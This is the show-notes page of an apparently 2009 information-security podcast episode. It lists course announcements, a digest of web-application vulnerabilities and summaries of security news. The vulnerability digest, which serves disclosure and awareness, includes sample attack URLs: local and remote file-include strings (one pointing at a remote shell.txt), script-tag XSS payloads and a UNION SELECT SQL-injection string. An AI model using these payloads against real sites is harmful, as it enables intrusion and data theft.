Your daily source of Pwnage, Policy and Politics.

[display_podcast]

Episode 37 – Year End

Play

InfoSec Podcast Episode 37 for December 30, 2009. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. When your systems are down, as a small and medium-sized businesses the resulting downtime can have a devastating impact.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Goto www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10

Go online to register by going to http://www.sans.org/atlanta-cs-events-2010/?utm_source=web-sans&utm_medium=banner&utm_content=Featured_Community_SANS_atlanta-2010-cs_events&utm_campaign=Community_SANS_Atlanta_2010&ref=52093

or call (301) 654-SANS(7267).

Vulnerabilities of Interest:

  1. RoseOnlineCMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input which could be exploited to obtain potentially sensitive information or to execute local scripts. RoseOnlineCMS 3 B1 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/modules/admincp.php?admin=[LFI%00]
  2. phpAuction is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data this could lead to execution of script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Example URLs: http://www.example.com/phpauction/register.php?TPL_name=1>”><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&TPL_nick=indoushka&[email protected]&[email protected]&[email protected] and http://www.example.com/phpauction/register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C/ScRiPt%3E&[email protected]&[email protected]&[email protected]&TP
  3. The ‘com_adagency’ component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input which could allow an attacker to potentially obtain sensitive information and execute local scripts in the context of the webserver process. Example URL: http://www.example.com/index.php?option=com_adagency&controller= [-LFI-]
  4. The Memory Book component for Joomla! is subject to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability which could allow an attacker to compromise the application, upload files, execute code, access or modify data, or exploit other vulnerabilities in the underlying database. Memory Book 1.2 is vulnerable; other versions may also be affected. All you need is a browser to exploit this vulnerability.
  5. DrBenHur.com DBHcms is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input which could allow an attacker to include an file containing malicious PHP code and execute it in the context of the webserver process. This may lead to a compromise of the application and the underlying system; other attacks are also possible. DBHcms 1.1.4 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/index.php?dbhcms_core_dir=http://www.example.org/shell.txt%00
  6. UPDATE: Microsoft IIS security-bypass vulnerability was reported to have a vulnerability which could cause IIS to interpret unexpected files as CGI applications. For an exploit to succeed, IIS must be configured in a nondefault way and contrary to the vendor’s recommended best practices.
  7. The Q-Personel component for Joomla! is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input which could be leveraged to execute script code in the browser of an unsuspecting user. Q-Personel 1.0.2(RC2) is vulnerable; other versions may be affected as well. Example URL: http://www.example.com/j15x/index.php?option=com_qpersonel&task=sirala&personel_sira=[XSS CODE]
  8. Stash is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data which could be leveraged to execute script code in the browser of an unsuspecting user. Stash 1.0.3 is vulnerable; other versions may also be affected. To exploit these issues, an attacker get the victim into following a malicious URL.
  9. Calendar Express is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query which could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Example URL: http://www.example.com/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+usi
News Items of Interest:
According to Adult Protective Services workers in this tough economy, reports have steadily increased of financial scams involving the elderly victims. They have some recommendations for those with elderly family members. First, they recommend that you really listen to elderly relatives when they talk about their lives. Are they mentioning new friends, people soliciting money at the front door for charities or repairmen you’ve never heard of before? Is there talk of a new will? Has your loved one given money to someone recently? Is the phone jangling constantly with calls from telemarketing companies?

Take a good look around the house. Is there food in the refrigerator? Is the cupboard well-stocked with food that hasn’t expired? Do labels indicate that medications have been prescribed by one doctor, or many? Are medications being taken properly?

Seniors who have recently lost a spouse, close friend or child are particularly likely to isolate themselves, often leading to a spiral of depression, and they can be especially vulnerable to crooks.

It’s not enough that your elderly loved one still goes to the supermarket and drives a car: Their executive function, or higher level of reasoning, can deteriorate with age.

If your older relatives use the Internet, make sure they’re not sitting ducks for cyber crime. Have they installed firewalls on their computers? Are their passwords easily hacked? Have they taken a computer security class?

News item 2: http://shmooslugs.pbworks.com/

Robert Fuller has a site for ShmooCon Slugs to help facilitate people getting together for rides to ShmooCon 2010. If you’re not familiar with what a slugging is the site has a reference to wikipedia. Which states “Slugging, also known as casual carpooling, is the practice of forming ad hoc, informal carpools for purposes of commuting, essentially a variation of ride-share commuting and hitchhiking. While the practice is most common and most publicized in the congested Washington, D.C. area (where it is primarily used by commuters who live in Northern Virginia), slugging is also used in San Francisco,Pittsburgh, and other U.S. cities. Sluggers gather at local businesses and at government-run locations, albeit not always with official sanction.

News item 3:http://lists.shmoo.com/mailman/listinfo/shmoocon-roommates

There is also a mailing list is for attendees of Shmoocon to find roommates for Shmoocon. Shmoocon is not responsible for actions based on/around/near or anywhere near related to Shmoocon Roommates. Use at your own risk!

News item 4: http://reflextor.com/trac/a51
http://www.nytimes.com/2009/12/29/technology/29hack.html?_r=1&ref=technology
http://www.theregister.co.uk/2009/12/28/gsm_eavesdropping_breakthrough/
http://news.cnet.com/8301-1009_3-10422340-83.html?part=rss&subj=news&tag=2547-1_3-0-20

Computerworld has an interesting article on how simple it is for hackers to snoop 64-bit cipher called A5/1 encrypted GSM cellular calls. At the Chaos Communication Conference in Berlin, researcher Karsten Nohl said that he had compiled 2 terabytes worth of data — cracking tables that can be used as a kind of reverse phone-book to determine the encryption key used to secure a GSM (Global System for Mobile communications) telephone conversation or text message. While Nohl stopped short of releasing a GSM-cracking device — that would be illegal in many countries, including the U.S. — he said he divulged information that has been common knowledge in academic circles and made it “practically useable.”

According to Nohl. Using his tables, antennas, specialized software, and $30,000 worth of computing hardware to break the cipher, someone can crack the GSM encryption in real time and listen in on calls Let’s put this into perspective, there are about 3.5 billion GSM phones worldwide, making up about 80 percent of the mobile market, according to data from the GSM Alliance.

News item 5: http://www.nytimes.com/2009/12/26/opinion/26sat2.html?_r=2&adxnnl=1&adxnnlx=1261810873-sVGmBHkWduJvGowqvAkrFA

The Ohio Supreme Court has struck an important blow for privacy rights, ruling that the police need a warrant to search a cellphone. The court rightly recognized that cellphones today are a lot more than just telephones, that they hold a wealth of personal information and that the privacy interest in them is considerable. This was the first such ruling from a state supreme court. It is a model for other courts to follow.

The Ohio Supreme Court ruled this month, by a 4-to-3 vote, that the search violated the Fourth Amendment’s protection against unreasonable search and seizure. Rather than seeing a cellphone as a simple closed container, the majority noted that modern cellphones — especially ones that permit Internet access — are “capable of storing a wealth of digitized information.”

News item 6:http://www.wired.com/threatlevel/2009/12/montgomery-2
http://www.theregister.co.uk/2009/12/24/cia_montgomery/
A self-proclaimed software programmer who convinced the CIA that he had developed software capable of deciphering hidden messages in Al Jazeera broadcasts appears to have been responsible for an elevation in the national security level in late 2003, causing the grounding of international flights and the evacuation of the Metropolitan Museum of Art. Dennis Montgomery managed to convince a CIA Directorate of Science and Technology employee that his technology and the information it generated were credible. The information was passed to top government officials. Only later did it become evident that Montgomery had not shared his algorithms with anybody in the Government, nor was anyone in the government clear about how the information was obtained. Montgomery also reportedly received a no-bid US $30 million contract for “compression” and “automatic target recognition” technology that he claimed could analyze surveillance video from drones and identify weapons in people’s hands. A man who used to work with Montgomery says he helped fake about 40 demonstrations of the software.

News item 7: http://www.msnbc.msn.com/id/34611083/ns/technology_and_science-tech_and_gadgets/
Two New Jersey state legislators are sponsoring a bill that would impose hefty fines on people and/or organizations that send unsolicited text messages. Of particular concern to Sens. Joseph Vitale and Sean Kean are messages sent to the elderly and disabled and messages that cause people to exceed their monthly text message allotment, incurring additional costs from their providers. An unsolicited ad is defined as one that is sent without prior consent of the recipient that urges the recipient to rent or purchase services or merchandise. First time offenders would be fined up to US $10,000 and repeat offenders fined up to US $20,000. If the violator knew or should have known that the recipient was an elderly or disabled person, the maximum fine increases to US $30,000.

News item 8: http://www.theregister.co.uk/2009/12/24/ddos_attack_ultradns_december_09/
http://www.computerworld.com/s/article/9142681/DDoS_attack_on_DNS_hits_Amazon_and_others_briefly?source=rss_security
http://www.cnn.com/2009/TECH/12/24/cnet.ddos.attack/index.html
http://www.informationweek.com/news/storage/security/showArticle.jhtml?articleID=222100146
A distributed denial-of-service (DDoS) attack against the DNS provider for Amazon, Wal-Mart, the Gap and other shopping websites made those sites temporarily unavailable. The attack that was launched against Neustar on December 23 affected users in Northern California. Although the attack kept the sites unavailable for about an hour, last-minute holiday shoppers experienced frustrating delays. An UltraDNS spokesperson said that “queries may have taken some time to resolve and some may not have been completed, but there never was an outage.”

News item 9: http://www.washingtonpost.com/wp-dyn/content/article/2009/12/23/AR2009122302970_pf.html
A report from the Government Accountability Office (GAO) faults five government agencies, two congressional offices and the National Security Council for the leak of information about hundreds of US civilian nuclear facilities. The document was published on the Government Printing Office website in June and remained visible for about one day. The document was intended for the International Atomic Energy Agency (IAEA). Some of the confusion stemmed from the document’s classification with an IAEA term that is not recognized in the US. NSC did not provide specific instructions for handling the document once delivered to the White House clerk’s office.

News item 10: http://abcnews.go.com/Business/wireStory?id=9418695
A US federal judge has granted preliminary approval to a proposed settlement that would have Countrywide Financial Corp. provide free credit monitoring to as many as 17 million people whose personal information was compromised. The settlement also provides up to US $50,000 in reimbursement for each instance of identity fraud that can be traced to the breach and for which the victims were not reimbursed otherwise and in which they lost something of value. The suit has its origins in data theft committed by former Countrywide analyst Rene Rebollo Jr., who downloaded thousands of customers’ information every week for two years and sold it to Wahid Siddiqi. Siddiqi pleaded guilty to fraud earlier this month; Rebollo’s trial is scheduled to begin in
January.

News item 11: http://www.theregister.co.uk/2009/12/24/inmate_prison_hack/
http://www.computerworld.com/s/article/9142628/Inmate_gets_18_months_for_hacking_prison_computer
Francis G. Janosko has been sentenced to 18 months in prison for breaking into the Plymouth (Massachusetts) County Correctional Facility’s computer network, accessing information about more than 1,100 prison employees and making that information available to other inmates. Janosko pleaded guilty to damaging a protected computer in September. Janosko, who was an inmate at the time on unrelated charges, was using a machine that was supposed to be configured to allow access only to a legal research program, but he managed to exploit a vulnerability that allowed him access to the Internet and to the prison network.

News 12: http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=222003024&subSection=Attacks/breaches
http://www.scmagazineus.com/citibank-refutes-reported-hack-by-russian-gang/article/160124/
http://news.cnet.com/8301-1009_3-10420308-83.html
http://www.cbsnews.com/stories/2009/12/23/eveningnews/main6016135.shtml
http://online.wsj.com/article/SB126145280820801177.html?mod=rss_Today%27s_Most_Popular
While the FBI says it is investigating losses totaling tens of millions of dollars from Citibank accounts, Citibank parent company Citigroup denies reports that it has fallen prey to a cyber attack or that an investigation is underway. Citigroup did acknowledge that their systems have been probed but persisted in denying that an attack occurred and that money was stolen from customer accounts. The cyber thieves allegedly used the Black Energy botnet in their attacks. Sources have suggested that the Russian Business Network, a notorious cybercrime network, is behind the cyber heists. There is a report of one man being blocked from accessing his company’s Citibank account; although he alerted the bank immediately, a day later, more than US $1 million had been withdrawn without his authorization. About 80 percent of the funds were recovered, and Citibank covered the man’s losses for the rest.

News item 13:http://www.scmagazineuk.com/mbna-confirms-data-loss-after-laptop-containing-personal-details-of-thousands-of-customers-was-stolen-from-vendor/article/160217/
http://www.net-security.org/secworld.php?id=8656
http://www.lep.co.uk/news/Customer-credit-card-details-stolen.5929370.jp
MBNA is notifying thousands of customers that a laptop stolen from NCO Europe offices contains their credit card information. NCO Europe is a third-party contractor. Although the files do contain personal information, no PINs are believed to be included. While no fraudulent activity has been detected on the compromised accounts, MBNA is offering affected customers one year of credit monitoring service and is monitoring all compromised accounts.

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.